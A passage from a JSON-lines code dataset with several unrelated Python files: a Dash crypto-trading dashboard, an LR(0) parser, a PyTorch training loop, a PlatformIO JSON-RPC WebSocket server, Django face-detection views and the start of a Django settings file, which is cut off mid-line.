vertical_spacing=0.12,\n )\n fig.append_trace(line_trace(df), 1, 1)\n fig.append_trace(bar_trace(df), 2, 1)'''\n fig = go.Figure()\n fig.add_traces([line_trace(df, 'close')])\n fig[\"layout\"] = get_fig_layout()\n return fig\n \n\ndef get_sma_fig(df):\n fig = go.Figure()\n entry_df = df.loc[df[\"entry/exit\"] == 1.0]\n exit_df = df.loc[df[\"entry/exit\"] == -1.0]\n entry_marker = marker_trace(entry_df.index, \n entry_df.sma10, \n 'triangle-up', '#0efa0a', 'buy')\n exit_marker = marker_trace(exit_df.index, \n exit_df.sma10, \n 'triangle-down', '#FF0000', 'sell')\n fig.add_traces([line_trace(df, 'sma10', '#fa760a'), \n line_trace(df, 'sma20', '#0af7f7'), \n entry_marker, \n exit_marker])\n fig[\"layout\"] = get_fig_layout()\n return fig\n\n\ndef get_trade_fig(df):\n fig = go.Figure()\n fig.add_traces([line_trace(df, 'entry/exit')])\n fig[\"layout\"] = get_fig_layout()\n return fig\n\ndef get_backtest_fig(df, timeframe):\n fig = go.Figure()\n tickformat = {}\n if (timeframe in ['30m','1h','1d','1w']):\n tickformat = {'tickformat':'%Y-%m-%d'}\n entry_df = df.loc[df[\"Entry/Exit\"] == 1.0]\n exit_df = df.loc[df[\"Entry/Exit\"] == -1.0]\n entry_marker = marker_trace(entry_df.index, \n entry_df['Portfolio Total'], \n 'circle', '#15ed24', 'buy', 10)\n exit_marker = marker_trace(exit_df.index, \n exit_df['Portfolio Total'], \n 'circle', '#ed1f3f', 'sell', 8)\n fig.add_traces([line_trace(df, 'Portfolio Total', '#b2c2c0'), \n entry_marker, \n exit_marker])\n fig[\"layout\"] = get_fig_layout(**tickformat)\n return fig\n\n\n\n'''\nCallbacks starts\n'''\n\n#app.config.suppress_callback_exceptions = True\n@app.callback([Output('crypto-2-symbol', 'data'),\n Output('two-sec-interval', 'disabled'),\n Output('five-sec-interval', 'disabled')],\n [Input('trade-btn', 'n_clicks')],\n [State('crypto-2-select-dropdown', 'value'),\n State('trade-model-select-dropdown', 'value')])\ndef reinitalize_crypto(n_clicks, crypto, model):\n if(crypto==None or crypto==''):\n raise PreventUpdate\n crypto_stream.init_connection()\n #data = [{'close':0.0, \"balance\": 10000, \"shares\": 0, 'status':''}]\n return crypto, False, False\n\n@app.callback(Output('live-crypto-graph', 'figure'),\n [Input('two-sec-interval', 'n_intervals')],\n [State('crypto-2-symbol', 'data')])\ndef update_close_scatter(n, crypto):\n df = crypto_stream.fetch_data(crypto)\n return get_close_fig(df)\n\n\n@app.callback([Output('stream-table', 'data'),\n Output('entry-exit-dict', 'data'),\n Output('live-trade-graph', 'figure'),\n Output('live-signal-graph', 'figure')],\n [Input('five-sec-interval', 'n_intervals')],\n [State('stream-table', 'data'),\n State('entry-exit-dict', 'data'),\n State('trade-model-select-dropdown', 'value')])\ndef execute_trade(n_intervals, buy_sell_data, entry_exit_df, model):\n if entry_exit_df:\n entry_exit_df = pd.DataFrame.from_dict(entry_exit_df)\n is_sma = (model=='SMA10')\n entry_exit_df = crypto_stream.generate_signals(crypto_stream.get_data_from_table())\n if not is_sma and len(entry_exit_df)>20:\n entry_exit_df = models.predict(entry_exit_df, model, 20)\n if len(entry_exit_df)<10: \n raise PreventUpdate\n else:\n account= buy_sell_data[-1]\n account = crypto_stream.execute_trade_strategy(entry_exit_df, account)\n print(account)\n if account:\n buy_sell_data.append(account)\n return buy_sell_data, entry_exit_df.to_dict('series'), get_trade_fig(entry_exit_df), get_sma_fig(entry_exit_df)\n\n@app.callback([Output(\"loading-output-1\", \"children\"),\n Output('backtesting-results-container', 'style'),\n Output('crypto-1-symbol', 'data'),\n Output('trade-metric-table', 'data'),\n Output('backtesting-graph', 'figure'),\n Output('eval_metric_table', 'data')],\n [Input('backtest-btn', 'n_clicks')],\n [State('crypto-1-select-dropdown', 'value'),\n State('model-select-dropdown', 'value'),\n State('timeframe-select-dropdown', 'value'),\n State('initial-capital-input', 'value'),\n State('no-of-shares-input', 'value')])\ndef reinitalize_model(n_clicks, crypto, model_name, timeframe, initial_capital, no_of_shares):\n portfolio_metrics, trade_metrics, portfolio_evaluation = backtesting.main(crypto, model_name, timeframe, initial_capital, no_of_shares)\n return '', {'display':'block'},crypto, trade_metrics.to_dict(\"rows\"), get_backtest_fig(portfolio_metrics, timeframe), portfolio_evaluation.reset_index().to_dict(\"rows\")\n\n\n'''\nCallbacks ends\n'''\n\ndef get_data_table(table_info):\n return dash_table.DataTable(\n id=table_info['id'],\n style_header={\"fontWeight\": \"bold\", \"color\": \"inherit\"},\n style_as_list_view=True,\n fill_width=True,\n style_cell={\n \"backgroundColor\": \"#1e2130\",\n \"fontFamily\": \"Open Sans\",\n \"padding\": \"0 2rem\",\n \"color\": \"darkgray\",\n \"border\": \"none\",\n },\n css=[\n {\"selector\": \"tr:hover td\", \n \"rule\": \"color: #91dfd2 !important;\"},\n {\"selector\": \"tr:last-child\", \n \"rule\": \"display:none !important;\"},\n {\"selector\": \"td\", \n \"rule\": \"border: none !important;\"},\n {\"selector\": \".dash-cell.focused\",\"rule\": \n \"background-color: #1e2130 !important;\",\n },\n {\"selector\": \"table\", \n \"rule\": \"--accent: #1e2130;\"},\n {\"selector\": \"tr\", \n \"rule\": \"background-color: transparent\"},\n ],\n data=table_info['data'],\n columns=table_info['columns'])\n\ndef get_evaluation_metrics_table(data=[]):\n return dash_table.DataTable(\n id='eval_metric_table',\n style_header={\"fontWeight\": \"bold\", \"color\": \"inherit\"},\n style_as_list_view=True,\n fill_width=True,\n style_cell_conditional=[\n {\"if\": {\"column_id\": \"Specs\"}, \"textAlign\": \"left\"}\n ],\n style_cell={\n \"backgroundColor\": \"#1e2130\",\n \"fontFamily\": \"Open Sans\",\n \"padding\": \"0 2rem\",\n \"color\": \"darkgray\",\n \"border\": \"none\",\n },\n css=[\n {\"selector\": \"tr:hover td\", \"rule\": \"color: #91dfd2 !important;\"},\n {\"selector\": \"td\", \"rule\": \"border: none !important;\"},\n {\n \"selector\": \".dash-cell.focused\",\n \"rule\": \"background-color: #1e2130 !important;\",\n },\n {\"selector\": \"table\", \"rule\": \"--accent: #1e2130;\"},\n {\"selector\": \"tr\", \"rule\": \"background-color: transparent\"},\n ],\n data=data,#new_df.to_dict(\"rows\"),\n columns=[{\"id\": c, \"name\": c} for c in [\"Metrics\", \"Backtest\"]],\n )\n\ndef get_btn_div(id_btn, btn_name):\n return html.Div(\n children=[html.Button(\n btn_name,\n id=f\"{id_btn}-btn\",\n n_clicks=0\n )])\ndef get_dropdown(id_name, data_list, value, title):\n return html.Div(\n id=f\"{id_name}-select-menu\",\n # className='five columns',\n children=[\n html.Label(id=f\"{id_name}-select-title\", children=f\"{title}\"),\n dcc.Dropdown(\n id=f\"{id_name}-select-dropdown\",\n options=list(\n {\"label\": data, \"value\": data} for data in data_list\n ),\n value=value,\n )])\n\ndef get_numeric_input(id_name, value, title):\n return html.Div(\n id=f\"{id_name}-menu\",\n # className='five columns',\n children=[\n html.Label(id=f\"{id_name}-title\", children=title),\n daq.NumericInput(\n id=f\"{id_name}-input\", className=\"setting-input\", value=value, size=200, max=9999999\n)])\n \ndef build_trade_panel():\n return html.Div(\n id=\"top-section-container\",\n className=\"row\",\n children=[\n dcc.Store(id='crypto-2-symbol', storage_type='local', data=crypto_stream.SYMBOL),\n dcc.Store(id='entry-exit-dict'),\n # Metrics summary\n html.Div(\n id=\"live-data-streaming\",\n className=\"eight columns\",\n children=[\n generate_section_banner(\"Closing Price\"),\n dcc.Graph(id='live-crypto-graph'),\n generate_section_banner(\"Signals\"),\n dcc.Graph(id='live-signal-graph'),\n generate_section_banner(\"Trade\"),\n dcc.Graph(id='live-trade-graph', figure={'layout':get_fig_layout()})\n ],\n ),\n # Piechart\n html.Div(\n id=\"trade-table\",\n className=\"four columns\",\n children=[\n html.Br(),\n get_dropdown('crypto-2', crypto_stream.get_crypto_symbols(), '', 'Crypto'),\n html.Br(),\n get_dropdown('trade-model', models.MODEL_LIST , models.MODEL_LIST[0], 'Model'),\n html.Br(),\n get_btn_div('trade', 'Trade'),\n html.Br(),\n #get_crypto_dropdown('crypto-2'),\n generate_section_banner(\"Trade Data\"),\n get_data_table(STREAM_TABLE)\n ],\n ),\n ],\n )\n\n\ndef build_backtesting_panel():\n return html.Div([\n # Manually select metrics\n html.Div(\n id=\"set-specs-intro-container\",\n # className='twelve columns',\n children=html.P(\n \"Use Backtesting, to evaluate the effectiveness of a AI model by running the strategy against historical data \"\n )\n ),\n html.Div(\n id=\"settings-menu\",\n children=[\n dcc.Store(id='crypto-1-symbol', storage_type='local', data=crypto_stream.SYMBOL),\n html.Div(\n id=\"backtesting-settings\",\n className=\"five columns\",\n children=[\n html.Div(\n className=\"six columns\",\n children=[\n html.Br(),\n get_dropdown('crypto-1', crypto_stream.get_crypto_symbols(), crypto_stream.SYMBOL, 'Crypto'),\n #get_crypto_dropdown('crypto-1'),\n html.Br(),\n get_dropdown('model', backtesting.model_list(), backtesting.model_list()[0], 'Model'),\n html.Br(),\n get_numeric_input('no-of-shares', 10, 'No of Shares')\n ]\n ),\n html.Div(\n className=\"six columns\",\n children=[\n html.Br(),\n get_dropdown('timeframe', ['1m', '5m', '30m', '1h', '1d','1w'], '1m', 'Interval'),\n html.Br(),\n get_numeric_input('initial-capital', 100000.0, 'Initial Capital'),\n html.Br(),\n html.Br(),\n get_btn_div('backtest', 'Backtest'),\n html.Br(),\n \n ]\n )\n ]),\n html.Div(\n id='loading-div',\n className=\"one columns\",\n children=[\n html.Br(),\n html.Br(),\n html.Div(\n className='ten rows',\n children=[dcc.Loading(\n id=\"loading-1\",\n type=\"default\",\n children=html.Div(id=\"loading-output-1\")\n )\n ]\n ),\n html.Br(),\n ]\n ),\n html.Div(\n id=\"backtesting-metrics\",\n className=\"six columns\",\n children=[\n generate_section_banner(\"Portfolio Evaluation Metrics\"),\n html.Br(),\n get_evaluation_metrics_table()\n ]\n )\n ]\n\n ),\n html.Div(\n id=\"backtesting-results-container\",\n style={\"display\": \"none\"},\n className='twelve columns',\n children=[\n html.Br(),\n generate_section_banner(\" Trading Strategy vs. Backtest Results\"),\n dcc.Graph(id='backtesting-graph'),\n html.Br(),\n generate_section_banner(\"Trade Evaluation Metrics\"),\n html.Br(),\n html.Div(id=\"portfolio-metric-panel\", children=[get_data_table(TRADE_METRIC_TABLE),\n ],\n ),\n ])])\n\n\ndef build_tabs():\n return html.Div(\n id=\"tabs\",\n className=\"tabs\",\n children=[\n dcc.Tabs(\n id=\"app-tabs\",\n value=\"tab1\",\n className=\"custom-tabs\",\n children=[\n dcc.Tab(\n id=\"Specs-tab\",\n label=\"Model Backtesting\",\n value=\"tab1\",\n className=\"custom-tab\",\n selected_className=\"custom-tab--selected\",\n children=build_backtesting_panel()\n ),\n dcc.Tab(\n id=\"Control-chart-tab\",\n label=\"Control Charts Dashboard\",\n value=\"tab2\",\n className=\"custom-tab\",\n selected_className=\"custom-tab--selected\",\n children=build_trade_panel()\n ),\n ],\n )\n ],\n )\n\n\ndef build_banner():\n return html.Div(\n id=\"banner\",\n className=\"banner\",\n children=[\n html.Div(\n id=\"banner-text\",\n children=[\n html.H5(\"Mind Bot\"),\n html.H6(\"An Automated program that buy and sell cryptocurrencies at the right time\"),\n ],\n ),\n html.Div(\n id=\"banner-logo\",\n children=[\n #html.Button(id=\"learn-more-button\", children=\"LEARN MORE\", n_clicks=0),\n html.Img(id=\"logo\", src=app.get_asset_url(\"dash-new-logo.png\")),\n ],\n ),\n ],\n )\n\n\n\n\napp.layout = html.Div(\n id=\"big-app-container\",\n children=[\n build_banner(),\n # Interval component for live clock\n dcc.Interval(id=\"two-sec-interval-sma\", disabled=True, interval=1 * 1000, n_intervals=0),\n dcc.Interval(id=\"two-sec-interval\", disabled=True, interval=1 * 1000, n_intervals=0),\n dcc.Interval(id=\"five-sec-interval\", disabled=True, interval=1 * 1000, n_intervals=0),\n dcc.Interval(\n id=\"interval-component\",\n interval=2 * 1000, # in milliseconds\n n_intervals=50, # start at batch 50\n disabled=True,\n ),\n html.Div(\n id=\"app-container\",\n children=[\n build_tabs(),\n # Main app\n html.Div(id=\"app-content\"),\n ],\n )\n ],\n)\n\n\n\n# Running the server\nif __name__ == \"__main__\":\n #app.run_server(debug=True, port=8050)\n app.run_server()\n ","sub_path":".ipynb_checkpoints/app-checkpoint.py","file_name":"app-checkpoint.py","file_ext":"py","file_size_in_byte":23632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"248900312","text":"from PIL import Image\nimport numpy as np\nimport os\n\nimg_path = \"./test.png\"\n\nimg = Image.open(img_path)\nprint('img: ',img)\n\nimg_numpy = np.array(img)\nprint('img_numpy.shape: ',img_numpy.shape)\nimg_transpose = img_numpy.transpose(2,1,0)\nprint('img_transpose.shape: ',img_transpose.shape)\n\nimg_transpose.flags.writeable = True\n\nimg = Image.fromarray(img_transpose,mode ='RGB') # mode is necessary\nprint('img: ',type(img))\n\n\n\n","sub_path":"t0115_numpy_Image.py","file_name":"t0115_numpy_Image.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403938247","text":"class Parser:\n \"\"\"\n The LR(0) parser algorithm.\n \"\"\"\n\n def __init__(self, grammar):\n self.grammar = grammar\n self.workingStack = []\n self.inputStack = []\n self.output = []\n\n def closure(self, productions):\n \"\"\"\n Constructs one clojure of the canonical collections.\n Takes a state containing productions.\n :param productions: List of productions for closure\n :return: a state. List of tuples\n [('S1', ['.', 'S']), ('S', ['.', 'aA']), ('S', ['.', 'bB'])],\n \"\"\"\n if not productions:\n return None\n closure = productions\n done = False\n while not done:\n done = True\n # Iterate each production in the state/clojure\n for dotted_prod in closure:\n dot_index = dotted_prod[1].index('.') # where is dot in rhs\n alpha = dotted_prod[1][:dot_index] # what is left of the dot\n b_beta = dotted_prod[1][dot_index + 1:] # what is right of the dot\n\n # If nothing after dot, then is final state\n if len(b_beta) == 0:\n continue\n\n B = b_beta[0]\n if B in self.grammar.E:\n continue\n for prod in self.grammar.get_productions(B):\n # adds item formed from production with dot in front of rhs of the production\n dotted_prod = (B, ['.'] + prod)\n if dotted_prod not in closure:\n closure += [dotted_prod]\n done = False\n return closure\n\n def go_to(self, state, symbol):\n \"\"\"\n Transition from a state to another using a terminal or non-terminal.\n Used in generating parsing table and the canonical collection.\n :param state: String\n :param symbol: String\n :return: a state, list of tuples\n \"\"\"\n C = []\n # in state search for LR(0) item that has dot in front of symbol\n for production in state:\n dot_index = production[1].index('.')\n alpha = production[1][:dot_index]\n xbeta = production[1][dot_index + 1:]\n if len(xbeta) == 0:\n continue\n X, beta = xbeta[0], xbeta[1:]\n if X == symbol:\n # move the dot after the symbol\n res = alpha + [X] + ['.'] + beta\n result_prod = (production[0], res)\n C += [result_prod]\n # call closure on this new item\n return self.closure(C)\n\n def get_canonical_collection(self):\n \"\"\"\n Constructs set of states.\n C - canonical collection\n ex: [\n [('S1', ['.', 'S']), ('S', ['.', 'aA']), ('S', ['.', 'bB'])],\n [('S1', ['S', '.'])],\n ...\n ]\n :return: Collection of states\n \"\"\"\n C = [self.closure([('S1', ['.', self.grammar.S[0]])])] # augment the grammar\n finished = False\n while not finished: # while we add a new state to the collection\n finished = True\n for state in C:\n for symbol in self.grammar.N + self.grammar.E:\n next_state = self.go_to(state, symbol)\n if next_state is not None and next_state not in C:\n C += [next_state]\n finished = False\n return C\n\n def generate_table(self):\n \"\"\"\n Generates the parsing table used to check the input tokens.\n A dictionary for each state I ~ the rows\n :return: parsing table. List of dictionaries containing action and maybe non/terminals\n [{'action': 'shift', 'S': 1, 'A': 2, 'a': 3, 'b': 4}, {'action': 'acc'},\n {'action': 'shift', 'A': 6, 'a': 3, 'b': 4}, {'action': 'reduce 2'}, {'action': 'reduce 1'}]\n \"\"\"\n states = self.get_canonical_collection()\n # self.print_canonical_collection(states)\n table = [{} for _ in range(len(states))]\n\n for index in range(len(states)):\n state = states[index]\n first_rule_cnt = 0\n second_rule_cnt = 0\n third_rule_cnt = 0\n beta = []\n for prod in state:\n dot_index = prod[1].index('.')\n alpha = prod[1][:dot_index]\n beta = prod[1][dot_index + 1:]\n if len(beta) != 0:\n first_rule_cnt += 1\n else:\n if prod[0] != 'S1':\n second_rule_cnt += 1\n production_index = self.grammar.P.index((prod[0], alpha))\n elif alpha == [self.grammar.S[0]]:\n third_rule_cnt += 1\n if first_rule_cnt == len(state):\n table[index]['action'] = 'shift'\n\n elif second_rule_cnt == len(state):\n table[index]['action'] = 'reduce ' + str(production_index)\n\n elif third_rule_cnt == len(state):\n table[index]['action'] = 'acc'\n else:\n conflict_msg = 'Conflict! State I' + str(index) + ': ' + str(state) + '\\nSymbol: ' + beta[0]\n raise (Exception(conflict_msg))\n for symbol in self.grammar.N + self.grammar.E: # the goto part of the table\n next_state = self.go_to(state, symbol)\n if next_state in states:\n table[index][symbol] = states.index(next_state)\n # print(\"table\", table)\n return table\n\n def parse(self, input_string):\n \"\"\"\n inputStack - list of strings. PIF code for each token read from txt file.\n ['33', '18', '19', '16', '25', '0', '6', '1', '15', '31', '0', '15', '17']\n table - [{'action': 'shift', 'S': 1, 'A': 2, 'a': 3, 'b': 4}, {'action': 'acc'},\n {'action': 'shift', 'A': 5, 'a': 3, 'b': 4}, {'action': 'shift', 'A': 6, 'a': 3, 'b': 4},\n {'action': 'reduce 2'}, {'action': 'reduce 0'}, {'action': 'reduce 1'}]\n workingStack - used to parse the inputStack\n ['0']\n :param input_string: list of strings, equal to inputStack\n :return: output - [0,2,1,1,2]\n S -> .. -> aabb\n List of integers representing reduce states. Each production rule has a number/reduce_state).\n Output is the list of steps needed to obtain the input_string starting from starting non-terminal S.\n \"\"\"\n print(\"----------- Syntax analysis -----------\")\n table = self.generate_table()\n self.workingStack = ['0']\n self.inputStack = [char for char in input_string]\n self.output = []\n try:\n print(\"--------- Parsing ---------\")\n while len(self.workingStack) != 0:\n state = int(self.workingStack[-1]) # which dict from parsing table, index of state\n if len(self.inputStack) > 0:\n char = self.inputStack.pop(0)\n else:\n char = None\n if table[state]['action'] == 'shift':\n # Shift operation on the stack\n if char not in table[state]:\n raise (Exception(\"Syntax error! Expected \" + str(table[state]) +\n \"!\\nCannot parse shift. Character: \" + char))\n self.workingStack.append(char)\n self.workingStack.append(table[state][char])\n elif table[state]['action'] == 'acc':\n # Accept operation, sequence is accepted\n if len(self.inputStack) != 0:\n raise (Exception(\"Syntax error! Expected \" + str(table[state]) +\n \"!\\nCannot parse accept. Character: \" + char))\n self.workingStack.clear()\n else:\n # Reduce operation on the stack\n reduce_state = int(table[state]['action'].split(' ')[1])\n reduce_production = self.grammar.P[reduce_state]\n to_remove_from_working_stack = [symbol for symbol in reduce_production[1]]\n while len(to_remove_from_working_stack) > 0 and len(self.workingStack) > 0:\n if self.workingStack[-1] == to_remove_from_working_stack[-1]:\n to_remove_from_working_stack.pop()\n self.workingStack.pop()\n if len(to_remove_from_working_stack) != 0:\n raise (Exception('Syntax error!' +\n '!\\nCannot parse reduce. Character: ', char))\n self.inputStack.insert(0, char)\n self.inputStack.insert(0, reduce_production[0])\n self.output.insert(0, reduce_state)\n print('Syntax analysis successfully. Yay!')\n except Exception as ex:\n raise Exception(ex)\n print()\n return self.output\n\n @staticmethod\n def print_canonical_collection(cc):\n \"\"\"\n Print in a nicer format\n \"\"\"\n res = \"----------- Canonical Collection -----------\\n\"\n for elem in cc:\n res += str(elem) + \"\\n\"\n print(res)\n","sub_path":"Lab6 - Parser LR(0)/parser_algorithm/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"219116895","text":"\"\"\"\nMain train loop\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport sys\nimport yaml\nfrom data import Data\nfrom pascal_context_data import PascalContextData\nimport torch.optim as optim\nfrom model import SimpleFCN\nimport pdb\n# reads the config file, returns appropriate instantiation of Data class\ndef _dataset_factory(cfg_file) -> Data:\n\tf = open(cfg_file, 'r')\n\tcfg = yaml.load(f)\n\tf.close()\n\tif cfg['name'] == 'pascal_context':\n\t\treturn PascalContextData(cfg)\n\telse:\n\t\tprint(\"Dataset name not matched\")\n\t\texit(-1)\n\n# reads the config file, returns appropriate instantiation of pytorch Module class\ndef _model_factory(cfg_file) -> torch.nn.Module:\n\tf = open(cfg_file, 'r')\n\tcfg = yaml.load(f)\n\tf.close()\n\tif cfg['name'] == 'simple_fcn':\n\t\treturn SimpleFCN(cfg)\n\telse:\n\t\tprint(\"Model name not matched\")\n\t\texit(-1)\n\n\t\t\ndef train(model, data):\n\t# train the model\n\tmodel.cuda()\n\tnum_batches = data.get_num_batches()\n\toptimizer = optim.SGD(model.parameters(), lr=0.001, momentum=0.9)\n\toptimizer.zero_grad()\n\tcriterion = nn.CrossEntropyLoss()\n\tfor epoch in range(10):\n\t\tdata.shuffle() # shuffle the dataset\n\t\tfor iter in range(num_batches):\n\t\t\t# inputs sholud be N x 224 x 224 x 3\n\t\t\tinputs, labels = data.get_batch(iter)\n\t\t\tinputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())\n\t\t\t# labels and outputs should be N x 28 x 28 x 459\n\t\t\tlabels_reshaped = labels.view(-1)\n\n\t\t\toutputs = model(inputs)\n\t\t\tpdb.set_trace()\n\t\t\toutputs_reshaped = outputs.view(-1,459)\n\t\t\tloss = criterion(outputs_reshaped, labels_reshaped)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\t\t\tprint(loss.data[0])\n\n\t\t\t\nif __name__ == '__main__':\t \n\tdataset_cfg = sys.argv[1]\n\t# does nothing for now\n\tmodel_cfg = sys.argv[2]\n\t# load the appropriate dataset into a container\n\tdata = _dataset_factory(dataset_cfg)\n\tmodel = _model_factory(model_cfg)\n\ttrain(model, data)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"599733601","text":"# Copyright (c) 2014-present PlatformIO \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport inspect\nimport json\n\nimport click\nimport jsonrpc\nfrom starlette.endpoints import WebSocketEndpoint\n\nfrom platformio.compat import create_task, get_running_loop, is_bytes\nfrom platformio.proc import force_exit\n\n\nclass JSONRPCServerFactoryBase:\n\n connection_nums = 0\n shutdown_timer = None\n\n def __init__(self, shutdown_timeout=0):\n self.shutdown_timeout = shutdown_timeout\n self.dispatcher = jsonrpc.Dispatcher()\n\n def __call__(self, *args, **kwargs):\n raise NotImplementedError\n\n def addHandler(self, handler, namespace):\n self.dispatcher.build_method_map(handler, prefix=\"%s.\" % namespace)\n\n def on_client_connect(self):\n self.connection_nums += 1\n if self.shutdown_timer:\n self.shutdown_timer.cancel()\n self.shutdown_timer = None\n\n def on_client_disconnect(self):\n self.connection_nums -= 1\n if self.connection_nums < 1:\n self.connection_nums = 0\n\n if self.connection_nums == 0:\n self.shutdown_by_timeout()\n\n async def on_shutdown(self):\n pass\n\n def shutdown_by_timeout(self):\n if self.shutdown_timeout < 1:\n return\n\n def _auto_shutdown_server():\n click.echo(\"Automatically shutdown server on timeout\")\n force_exit()\n\n self.shutdown_timer = get_running_loop().call_later(\n self.shutdown_timeout, _auto_shutdown_server\n )\n\n\nclass WebSocketJSONRPCServerFactory(JSONRPCServerFactoryBase):\n def __call__(self, *args, **kwargs):\n ws = WebSocketJSONRPCServer(*args, **kwargs)\n ws.factory = self\n return ws\n\n\nclass WebSocketJSONRPCServer(WebSocketEndpoint):\n encoding = \"text\"\n factory: WebSocketJSONRPCServerFactory = None\n\n async def on_connect(self, websocket):\n await websocket.accept()\n self.factory.on_client_connect() # pylint: disable=no-member\n\n async def on_receive(self, websocket, data):\n create_task(self._handle_rpc(websocket, data))\n\n async def on_disconnect(self, websocket, close_code):\n self.factory.on_client_disconnect() # pylint: disable=no-member\n\n async def _handle_rpc(self, websocket, data):\n response = jsonrpc.JSONRPCResponseManager.handle(\n data, self.factory.dispatcher # pylint: disable=no-member\n )\n if response.result and inspect.isawaitable(response.result):\n try:\n response.result = await response.result\n response.data[\"result\"] = response.result\n response.error = None\n except Exception as exc: # pylint: disable=broad-except\n if not isinstance(exc, jsonrpc.exceptions.JSONRPCDispatchException):\n exc = jsonrpc.exceptions.JSONRPCDispatchException(\n code=4999, message=str(exc)\n )\n response.result = None\n response.error = exc.error._data # pylint: disable=protected-access\n new_data = response.data.copy()\n new_data[\"error\"] = response.error\n del new_data[\"result\"]\n response.data = new_data\n\n if response.error:\n click.secho(\"Error: %s\" % response.error, fg=\"red\", err=True)\n if \"result\" in response.data and is_bytes(response.data[\"result\"]):\n response.data[\"result\"] = response.data[\"result\"].decode(\"utf-8\")\n\n await websocket.send_text(json.dumps(response.data))\n","sub_path":"platformio/commands/home/rpc/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441580114","text":"from datetime import datetime\nfrom unittest2 import TestCase\nfrom ert.util import ctime\n\n\nclass CTimeTest(TestCase):\n\n def test_c_time(self):\n c_time = ctime(0)\n self.assertEqual(str(c_time), \"1970-01-01 01:00:00\")\n\n date_time = ctime(datetime(1970, 1, 1, 1, 0, 0))\n self.assertEqual(c_time, date_time)\n\n date_time_after = ctime(datetime(1970, 1, 1, 1, 0, 5))\n\n self.assertTrue(date_time_after > date_time)","sub_path":"devel/python/test/ert_tests/util/test_ctime.py","file_name":"test_ctime.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"202034812","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nfrom django.shortcuts import render\nfrom datetime import datetime\nfrom .models import Post, Img\n\n# trips/views.py\n\nfrom django.http import HttpResponse\n\nimport tensorflow as tf\nimport cv2, sys, numpy as np, os.path \ncascPath = \"/home/ai_primary_school/mysite/trips/haarcascade_frontalface_default.xml\"\nfaceCascade = cv2.CascadeClassifier(cascPath)\nfrom train import load_model\nfrom train import Model\nmodel = Model()\nmodel.load()\nmodel.predict(cv2.imread('/home/ai_primary_school/mysite/temp/test.jpg'))\n\ndef hello_world(request):\n return render(request, 'hello_world.html', {\n 'current_time': str(datetime.now()),\n })\n\ndef home(request):\n post_list = Post.objects.all()\n return render(request, 'home.html', {\n 'post_list': post_list,\n })\n\ndef post_detail(request, pk):\n post = Post.objects.get(pk=pk)\n return render(request, 'post.html', {'post': post})\n\n\ndef uploadImg(request): # 图片上传函数\n if request.method == 'POST':\n img = Img(img_url=request.FILES.get('img'))\n img.save()\n originPath = \"/home/ai_primary_school/mysite/media/img\"\n desPath = \"/home/ai_primary_school/mysite/temp\"\n for root, dirs, files in os.walk(originPath, topdown=False):\n for name in files: \n temp = cv2.imread(os.path.join(root, name)) \n cv2.imwrite(os.path.join(desPath, \"test.jpg\"), temp)\n return render(request, 'imgupload.html')\n\ndef showImg(request):\n imgDB = Img.objects.raw('SELECT * FROM trips_img ORDER BY 1 DESC LIMIT 1')\n imgs = cv2.imread('/home/ai_primary_school/mysite/temp/test.jpg')\n gray = cv2.cvtColor(imgs, cv2.COLOR_BGR2GRAY)\n result=0\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30, 30),\n flags = cv2.CASCADE_SCALE_IMAGE)\n for (x, y, w, h) in faces:\n #框出臉\n image=cv2.rectangle(imgs, (x, y), (x+w, y+h), (0, 255, 0), 2)\n #BGR轉RGB\n image = image[:,:,::-1]\n #將臉譜丟到丟到我們訓練的人臉分類神經網路\n result=model.predict(image)\n \n context = {\n 'imgs' : imgDB,\n 'current_time': result,\n }\n return render(request, 'showImg.html', context)\n\n\n\n\n\n\n\n\n\n","sub_path":"trips/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"269383209","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Django settings for project.\"\"\"\n\nimport os\n\n# sqlserver connection string\nfrom djimix.settings.local import LENEL_EARL, MSSQL_EARL\nfrom djimix.settings.local import INFORMIX_ODBC, INFORMIX_ODBC_TRAIN\nfrom djimix.settings.local import INFORMIX_ODBC_JXPROD, INFORMIX_ODBC_JXTEST\nfrom djimix.settings.local import (\n INFORMIXSERVER,\n DBSERVERNAME,\n INFORMIXDIR,\n ODBCINI,\n ONCONFIG,\n INFORMIXSQLHOSTS,\n LD_LIBRARY_PATH,\n LD_RUN_PATH,\n)\n\n# Debug\nDEBUG = False\nINFORMIX_DEBUG = 'debug'\nADMINS = (\n ('', ''),\n)\nMANAGERS = ADMINS\n\nSECRET_KEY = ''\nALLOWED_HOSTS = []\n\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'America/Chicago'\nSITE_ID = 1\nUSE_I18N = False\nUSE_L10N = False\nUSE_TZ = False\nDEFAULT_CHARSET = 'utf-8'\nFILE_CHARSET = 'utf-8'\nSERVER_URL = ''\nAPI_KEY = ''\nAPI_URL 